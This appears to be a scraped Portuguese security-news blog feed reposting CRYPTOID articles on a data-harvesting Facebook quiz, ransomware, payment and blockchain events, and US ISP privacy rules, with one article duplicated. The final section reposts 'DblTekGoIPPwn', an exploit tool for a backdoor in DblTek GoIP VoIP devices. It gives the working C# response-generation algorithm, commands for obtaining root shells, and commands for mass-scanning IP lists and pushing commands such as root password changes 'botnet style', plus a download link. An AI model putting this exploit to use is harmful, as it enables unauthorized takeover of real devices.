Anúncios

Security and Technology

Últimas

Kaspersky Lab emite aviso sobre o teste “Qual Celebridade Você Se Parece?” | CRYPTOID

Kaspersky Lab emite aviso sobre o teste “Qual Celebridade Você Se Parece?” Regina Tupinambá

Teste popular no Facebook solicita informações pessoais em troca de supostamente mostrar com qual famoso você se parece

São Paulo, Brasil, 29 de março de 2017 – Os especialistas em segurança da Kaspersky Lab divulgaram um aviso sobre o teste “Qual Celebridade Você Se Parece?”, que está circulando nos últimos dias pelo Facebook. O gancho para atrair usuários é mostrar com qual celebridade a pessoa se parece e faz com que o usuário compartilhe informações pessoais com a empresa criadora do teste.

Para realizar o teste, a empresa Vonvon solicita clicar em “Conectar-se ao Facebook” para ver o resultado. Ao fazer isso, uma janela indica o acesso ao teste e, ao fazer isso, a empresa recebe as informações públicas do perfil do usuário (incluindo nome, foto do perfil, idade, sexo, idioma, país e outras informações públicas), lista de amigos, e-mail, fotos, etc. Uma vez que estas condições são aceitas, o aplicativo carrega as fotos de perfil da conta Facebook e pede para o usuário escolher uma para encontrar sua suposta semelhança com uma celebridade.

Segundo a pesquisa “Você é um especialista em cibernética?” da Kaspersky Lab, um surpreendente 63% dos entrevistados diz não ler o contrato de licença antes de instalar um novo aplicativo em seu dispositivo, e um em cada cinco pessoas (20%) nunca leu as mensagens para instalar aplicativos; apenas clicam em “Próximo” e “Concordo”, sem entender o que estão autorizando.

Na verdade, alguns aplicativos podem afetar a privacidade do usuário, instalar outros apps ou mesmo alterar a configuração do sistema operacional de um dispositivo de forma completamente legal já que usuário clicou em “aceito” durante o processo de instalação.

“Hoje em dia é muito comum que usuários de redes sociais cliquem em jogos e apps sem pensar sobre os riscos envolvidos. Muitas vezes, estes são usados como um gancho para obter permissão para acessar informações confidenciais de usuários e outras pessoas – como contatos, mensagens privadas, localização, etc., para fins comerciais”, diz Roberto Martinez, analista de segurança da Kaspersky Lab. “Ao permitir esse acesso, você deve se fazer algumas perguntas importantes, como: quais informações foram solicitadas, essa informação é necessária para esse aplicativo e o que eles podem fazer com essa informação”.

A política de privacidade da empresa Vonvon diz que os dados recolhidos em seus jogos e aplicativos são usados para promover seus produtos via e-mail e para outros propósitos de marketing, que não são especificados. Ele também indica que as informações recebidas podem ser transferidas para outras empresas ou indivíduos com objetivo de “otimizar seus serviços e funcionamento do site”.

Em 2015, suas políticas de privacidade foram questionadas após o lançamento do teste “Quais Palavras Você Mais Usou No Facebook Esse Ano?”, que atraiu mais de 17 milhões de usuários. A partir daí, a empresa tem limitado as informações que solicita aos usuários.

Para evitar que suas informações sejam usadas e até mesmo compartilhado por empresas, a Kaspersky Lab oferece aos usuários as seguintes dicas para proteger seus dados pessoais destes perigosos:

Não aceite todos os convites para jogos e aplicativos que aparecem nas redes sociais;

Leia atentamente as condições e informações ao utilizar apps de jogos e testes;

Verifique frequentemente as configurações dos aplicativos em sua conta do Facebook, eliminando aqueles não utilizados, além de se certificar que os apps tenham acesso a uma quantidade mínima de dados;

Como você pode compartilhar informações de seus amigos quando você concorda em compartilhar sua lista de amigos, os apps também podem compartilhar suas informações. Certifique-se de alterar as configurações para controlar as categorias de informações que as pessoas podem compartilhar de você.

A Kaspersky Lab é uma empresa global de segurança cibernética fundada em 1997. A profunda inteligência de ameaças e conhecimentos de segurança da Kaspersky Lab cria constantemente soluções e serviços de segurança para proteger empresas, infraestruturas críticas, governos e consumidores em todo o mundo. O abrangente portfólio de segurança da empresa inclui proteção de ponta de ponta e uma série de soluções e serviços de segurança especializados em combater ameaças sofisticadas e ameaças digitais em evolução. Mais de 400 milhões de usuários são protegidos pelas tecnologias da Kaspersky Lab e ajudamos 270.000 clientes corporativos a proteger o que mais importa para eles. Saiba mais em http://ift.tt/12bkm78.

O post Kaspersky Lab emite aviso sobre o teste “Qual Celebridade Você Se Parece?” apareceu primeiro em CRYPTOID. http://ift.tt/2ozGYBt http://ift.tt/2aM8QhC

Anúncios

Consultor diz que empresas nunca devem pagar resgate pedido por ransomware

Consultor diz que empresas nunca devem pagar resgate pedido por ransomware Michael Corby, consultor da CGI, critica aqueles que acham que, às vezes, pagar o resgate é inevitável e a única maneira de recuperar dados essenciais http://ift.tt/eA8V8J http://ift.tt/2nN7xG2 http://ift.tt/2aM8QhC

CARDS PAYMENT & IDENTIFICATION 2017 destaca a importância da experiência do usuário | CRYPTOID

CARDS PAYMENT & IDENTIFICATION 2017 destaca a importância da experiência do usuário Regina Tupinambá

Com novo visual, o evento será realizado de 23 a 25 de maio no Transamérica Expo Center

Demonstrações mostrarão os benefícios das tecnologias na perspectiva do consumidor digital

A 22ª edição da feira CARDS PAYMENT & IDENTIFICATION 2017, promovida pela Informa Exhibitions de 23 a 25 de maio no Transamérica Expo Center, em São Paulo (SP), terá um foco especial na experiência do usuário.

Durante o evento, os expositores e palestrantes do Congresso mostrarão como as novas tecnologias podem agregar valor ao relacionamento com clientes, cada vez mais conectados e exigentes.

A CARDS PAYMENT & IDENTIFICATION 2017 é uma das principais feiras de tecnologia para o setor de cartões, meios de pagamento, e-commerce, identificação e certificação digital da América Latina. Devido ao sucesso do ano passado, tanto a feira quanto o congresso contarão com a participação das fintechs, que terão a oportunidade de falar e demonstrar tecnologias disruptivas que vão ao encontro do consumidor digital.

O potencial deste mercado foi abordado em novo relatório do FintechLab, que monitorou 247 iniciativas, distribuídas nas categorias Pagamentos (32%), Gestão Financeira (18%), Empréstimos (13%), Investimentos (8%), Funding (7%), Seguros (6%), Negociação de Dívidas (5%), Cryptocurrencies e DLTs (5%), Câmbio (4%) e Multisserviços (2%). A pesquisa, que contou com a participação de 177 respondentes, mostra que as iniciativas já receberam, de forma acumulada nos últimos anos, mais de R$ 1 bilhão em investimentos.

Luis Veiga | Diretor da CARDS

Paralelamente à exposição, a CARDS promoverá o Congresso, o V Seminário Nacional de Certificação Digital, o Fórum e-Commerce e o Fórum Varejo. O primeiro deles reunirá os players do setor de pagamento para que possam debater sobre os modelos de negócios praticados, cases de sucesso e tendências para o setor.

“Este ano a CARDS contará com algumas inovações. Haverá um palco central em 360º no meio da feira, trazendo os conteúdos e as discussões temáticas para o coração do evento”, destaca Luis Veiga, diretor da CARDS.

O objetivo é reunir um ecossistema virtuoso, formado por instituições financeiras, fintechs, empresas de tecnologia e varejo, que possa discutir soluções que gerem mais eficiência nas interações com os clientes. “O acesso à Internet trouxe um imediatismo, que se reflete em questões comportamentais. Em meio à transformação digital, o consumidor quer tudo rápido, fácil e na palma da mão. Por isso, as empresas precisam (re)pensar a forma como encaram a experiência do usuário em pagamentos”, afirma Veiga.

As inscrições já estão abertas no site do evento. A visita à exposição é gratuita. A participação nos Fóruns também é gratuita, mas precisa de uma pré-inscrição.

O acesso ao Congresso é pago e reservado aos congressistas que adquirirem seu ingresso.

“Nossa proposta é tangibilizar as experiências com meios de pagamento, incentivando demonstrações sobre pagamentos nos veículos, no celular e nos wearables; novas formas de autoatendimento, utilização de bitcoins, campanhas de fidelização, banco digital e segurança”, completa Luis Veiga.

O Crypto ID é um dos apoiadores deste evento.

Sobre a Informa Exhibitions

A Informa Exhibitions acredita que eventos são plataformas de conhecimento e de relacionamento, que auxiliam a impulsionar a economia brasileira. A empresa é filial do Informa Group, maior organizador de eventos, conferências e treinamentos do mundo, com capital aberto e papéis negociados na bolsa de Londres. Dentre os eventos realizados pela Informa Exhibitions no Brasil estão: Agrishow, Fispal Tecnologia, Fispal Food Service, ForMóbile, FutureCom, ABF Franchising Expo, SerigrafiaSign e Feimec, num total de 24 feiras setoriais. A Informa Exhibitions possui escritórios em São Paulo (sede) e Curitiba, com cerca de 200 profissionais. Nos últimos quatro anos, a empresa investiu cerca de R$ 400 milhões no Brasil em aquisições de eventos e marcas, o que levou a decisão estratégica de alterar o nome da empresa no Brasil de BTS Informa para Informa Exhibitions. Para mais informações, acesse: http://ift.tt/24fowNM.

O post CARDS PAYMENT & IDENTIFICATION 2017 destaca a importância da experiência do usuário apareceu primeiro em CRYPTOID. http://ift.tt/2nN5MZB http://ift.tt/2aM8QhC

Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 | CRYPTOID

Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 Regina Tupinambá

De acordo com o Grupo Cimcorp, que promove a Emerging Links, primeira conferência internacional de Blockchain no Brasil, essa tecnologia vai revolucionar setores diversos como a indústria, varejo e energia e Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027.

O Blockchain é uma tecnologia que já está revolucionando o mercado financeiro – onde é conhecida por ser a base da moeda virtual bitcoin ou por ajudar em estratégias para combater a lavagem de dinheiro e o financiamento do terrorismo. De acordo com o Grupo Cimcorp, o Blockchain vai revolucionar, ainda, as mais diversas áreas de atividades, inclusive as que podem interferir diretamente na vida dos consumidores.

Para se ter uma ideia de seu potencial, vale lembrar que, segundo estimativa do Fórum Econômico Mundial, o Blockchain e o Bitcoin devem representar 10 por cento do PIB global até 2027. Mas, segundo especialistas internacionais que estarão em São Paulo para o evento Emerging Links, primeira conferência internacional sobre Blockchain a se realizar no Brasil, essa participação tende a ser muito maior ainda antes desse prazo. Isso porque, a cada dia, as empresas descobrem novos usos para o Blockchain.

Nos Estados Unidos, o Walmart está testando o Blockchain para rastrear alfaces, carnes e doces das fazendas e fábricas onde são produzidos, até as prateleiras de suas lojas. Com essa iniciativa, a rede pretende, por exemplo, saber rapidamente qual alimento deu origem a um surto de salmonela, como o que atingiu várias pessoas em diversas cidades americanas em 2015. A gigante de mineração BHP Billiton está usando a tecnologia para rastrear a análise mineral feita por fornecedores externos, e a startup Everledger enviou dados únicos de identificação sobre um milhão de diamantes a um sistema de cadastro de Blockchain para desenvolver garantias de qualidade e ajudar os joalheiros a cumprir os regulamentos que excluem os “diamantes de sangue”.

Várias outras empresas em diversos países também começam a utilizar essa tecnologia em setores como agricultura, utilities e indústria. Por entender que essa é uma tecnologia que precisa ser discutida para benefício da sociedade, a Cimcorp decidiu promover no Brasil este primeiro evento, com mais de 20 renomados keynotes internacionais, além de 20 renomados palestrantes nacionais.

Veja a programação do evento emerginglinks que acontece em São Paulo nos dias 5 e 6 de abril de 2017

Mais informações sobre o evento podem ser acessadas no link http://ift.tt/2nAByrX.

Serviço:

Data: 5 e 6 de abril de 2017

Hora: 09h às 18h

Local: Roof Top 5 Convention Center, Av. Faria Lima, 201, Instituto Tomie Ohtake

O post Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 apareceu primeiro em CRYPTOID. http://ift.tt/2ngRooq http://ift.tt/2aM8QhC

Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 | CRYPTOID

Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 Regina Tupinambá

De acordo com o Grupo Cimcorp, que promove a Emerging Links, primeira conferência internacional de Blockchain no Brasil, essa tecnologia vai revolucionar setores diversos como a indústria, varejo e energia e Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027.

O Blockchain é uma tecnologia que já está revolucionando o mercado financeiro – onde é conhecida por ser a base da moeda virtual bitcoin ou por ajudar em estratégias para combater a lavagem de dinheiro e o financiamento do terrorismo. De acordo com o Grupo Cimcorp, o Blockchain vai revolucionar, ainda, as mais diversas áreas de atividades, inclusive as que podem interferir diretamente na vida dos consumidores.

Para se ter uma ideia de seu potencial, vale lembrar que, segundo estimativa do Fórum Econômico Mundial, o Blockchain e o Bitcoin devem representar 10 por cento do PIB global até 2027. Mas, segundo especialistas internacionais que estarão em São Paulo para o evento Emerging Links, primeira conferência internacional sobre Blockchain a se realizar no Brasil, essa participação tende a ser muito maior ainda antes desse prazo. Isso porque, a cada dia, as empresas descobrem novos usos para o Blockchain.

Nos Estados Unidos, o Walmart está testando o Blockchain para rastrear alfaces, carnes e doces das fazendas e fábricas onde são produzidos, até as prateleiras de suas lojas. Com essa iniciativa, a rede pretende, por exemplo, saber rapidamente qual alimento deu origem a um surto de salmonela, como o que atingiu várias pessoas em diversas cidades americanas em 2015. A gigante de mineração BHP Billiton está usando a tecnologia para rastrear a análise mineral feita por fornecedores externos, e a startup Everledger enviou dados únicos de identificação sobre um milhão de diamantes a um sistema de cadastro de Blockchain para desenvolver garantias de qualidade e ajudar os joalheiros a cumprir os regulamentos que excluem os “diamantes de sangue”.

Várias outras empresas em diversos países também começam a utilizar essa tecnologia em setores como agricultura, utilities e indústria. Por entender que essa é uma tecnologia que precisa ser discutida para benefício da sociedade, a Cimcorp decidiu promover no Brasil este primeiro evento, com mais de 20 renomados keynotes internacionais, além de 20 renomados palestrantes nacionais.

Veja a programação do evento emerginglinks que acontece em São Paulo nos dias 5 e 6 de abril de 2017

Mais informações sobre o evento podem ser acessadas no link http://ift.tt/2nAByrX.

Serviço:

Data: 5 e 6 de abril de 2017

Hora: 09h às 18h

Local: Roof Top 5 Convention Center, Av. Faria Lima, 201, Instituto Tomie Ohtake

O post Blockchain e Bitcoin representarão 10 por cento do PIB global até 2027 apareceu primeiro em CRYPTOID. http://ift.tt/2ngRooq http://ift.tt/2aM8QhC

O mercado reage ao apoio de Trump à revogação da lei de privacidade | CRYPTOID

O mercado reage ao apoio de Trump à revogação da lei de privacidade Regina Tupinambá

Ontem (28/3), a Casa Branca informou que o governo Trump apoia um projeto de lei para revogar regulamentos que exigem dos provedores de internet maior proteção à privacidade dos clientes.

Michal Salat

Uma das reações foi do diretor de Inteligência de Ameaças da Avast, Michal Salat, que fez estas observações sobre o assunto:

“As informações pessoais que os provedores de internet podem visualizar e armazenar incluem os sites que você visita, o tempo que você permanece nessa visita, o local onde você está, quando os visitou e que dispositivo usa para acessar. Com a revogação, os provedores americanos podem vender estes dados, sem permissão dos seus clientes. Isso, obviamente, coloca a privacidade dos americanos em risco, mas também significa que eles podem esperar anúncios mais direcionados, já que as informações coletadas pelos provedores provavelmente serão vendidas para empresas de publicidade e marketing”.
“Mas isso também aumenta a superfície de ataque dos hackers, já que agora mais empresas terão esses dados e todos eles poderiam ser violados por um hacker. Se essas informações caírem em mãos erradas, os cibercriminosos poderão usá-la para otimizar suas táticas de engenharia social, direcionar melhor os ataques e convencer as pessoas a baixarem malware. Se os americanos querem ter certeza de que seus dados permanecem privados, eles devem usar uma VPN (rede privada virtual). Uma VPN cria uma conexão criptografada segura e encaminha o tráfego para um servidor proxy. A conexão criptografada oculta o tráfego para o seu provedor, de modo que ele não possa ver quais páginas você visita. No entanto, ele ainda poderá ver a sua localização”.

As leis da privacidade obrigavam as empresas a informar aos usuários sempre que a elas fosse solicitada informações e qualquer dado sobre sua navegação na Internet.

Com a votação realizada esta terça-feira é possível que essa lei caia e que empresas, como por exemplo o Facebook e a Google, possam recolher informação sobre os dados de pesquisa e localização, entre outros, sem terem de pedir qualquer permissão ao usuário.

Segundo a CNN, a Casa Branca disse, que “apoia fortemente” a decisão de retirar as leis da privacidade. A votação dos senadores contou com 215 votos a favor da retirada da lei em questão, todos eles por parte de republicanos, e 205 votos contra, sendo que 13 foram de republicanos e os restantes de democratas. É esperada uma decisão definitiva, por parte de Trump, nos próximos dias.

A lei que agora foi suspensa foi aprovada em outubro de 2016 pela Comissão Federal de Comunicações (FCC) e exigia que as empresas que fornecem a conexão da Internet pedissem permissão aos utilizadores para venderem os seus dados (históricos de pesquisa, aplicações descarregadas, qual o dispositivo com que estava a aceder à rede, etc.). A nova lei anula estas condições e impõe que tais restrições não possam ser aplicadas novamente pela agência reguladora. Deixa de ser necessário às empresas solicitarem qualquer tipo de consentimento para poderem vender os dados recolhidos dos consumidores a anunciantes.

O post O mercado reage ao apoio de Trump à revogação da lei de privacidade apareceu primeiro em CRYPTOID. http://ift.tt/2njDIK5 http://ift.tt/2aM8QhC

DblTekGoIPPwn – Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, execute remote commands botnet style, and generate responses to challenges

Tool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.The Vulnerability
On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named ‘dbladm’. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
The problem with such a challenge response system is that the devices are as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be aquired on ANY DblTek GoIP device.
Original Article: http://ift.tt/2lCVNBS
Using the description of the backdoor provided in the article, I was able to write what I believe to be some of the first exploit code for this vulnerability. The core of this is of course the algorithm to generate the response based on a given challenge. Here is a function to do this written in C#.

static string ComputeResponse(string challengeStr){ int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after ‘N’. string modified = (challenge + 20139 + (challenge >> 3)).ToString(); // Perform some dummy 1337 operations. byte[] buffer = new byte[64]; // Copy the string into the first part of the buffer. for (int i = 0; i < modified.Length; i++) buffer[i] = (byte)modified[i]; var md5 = MD5.Create(); byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer. StringBuilder sb = new StringBuilder(); // Will hold the results. // Take the unpadded hex value of the first six bytes of the MD5. for (int i = 0; i < 6; i++) sb.Append(hash[i].ToString("x")); return sb.ToString(); // Profit}

DblTekGoIPPwn Command Line Interface (CLI)
When DblTekPwn is ran without arguments, the help is displayed. This is the output:

USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT][MODE]:-c –compute-response [CHALLENGE] Computes a response to the given challenge.-r –root-shell Starts a root shell with the vulnerable host.-s –send-commands [COMMAND_FILE] Sends commands from a file to vulnerable hosts.-t –test Tests hosts and determines if they are vulnerable.-h –help Displays this help and exits.[HOSTS]:-n –name [IP] Specifies a single IP address.-f –file [IP_FILE] Specifies a file with IP\nIP\nIP.[OUTPUT]:-o –output [OUTPUT_FILE] Specifies an output file. Default stdin.

ExamplesGetting a Root Shell on a Vulnerable System
DblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the following command using the vulnerable IP.

DblTekPwn.exe –root-shell –name 192.168.1.1

You will see output that looks like this:

Password: ***********

From here you can begin entering commands (there is no shell prompt).Calculating a Challenge Response
Say you wanted to calculate the response to a GoIP challenge N1746203308 . You would just run the following command.

DblTekPwn –compute-response N1746203308

The output will be the response:

d6176d3aab2

Checking a List of IPs
Say you wished to check list.txt of IPs for GoIPs that are vulnerable and send this output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that the IPs are seperated by a newline \n . The following command could then be ran.

DblTekPwn.exe –test –file list.txt –output results.txt

list.txt:

192.168.1.0192.168.1.1192.168.1.2:1337192.168.1.3192.168.1.4:2323

results.txt:

192.168.1.0 False192.168.1.1 True192.168.1.2:1337 True192.168.1.3 False192.168.1.4:2323 False

The False or True after the host indicates whether or not the IP is vulnerable.Sending Commands to a List of IPs
Say you had a list of commands (which is really a list of telnet inputs) in cmds.txt to send to list.txt of IPs and send the output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that BOTH the IPs AND commands are seperated by a newline \n in their respective files. The following command could then be ran.

DblTekPwn.exe –send-commands cmds.txt –file list.txt –output results.txt

list.txt:

192.168.1.0192.168.1.1192.168.1.2:1337192.168.1.3192.168.1.4:2323

cmds.txt:

passwd roottoortoorexit

results.txt:

192.168.1.0 False192.168.1.1 True192.168.1.2:1337 True192.168.1.3 False192.168.1.4:2323 False

The False or True after the host indicates whether or not the connection was successfully made and the commands delivered.
Download DblTekGoIPPwn http://ift.tt/2ogRRIY http://ift.tt/2aM8QhC

%d blogueiros gostam disto: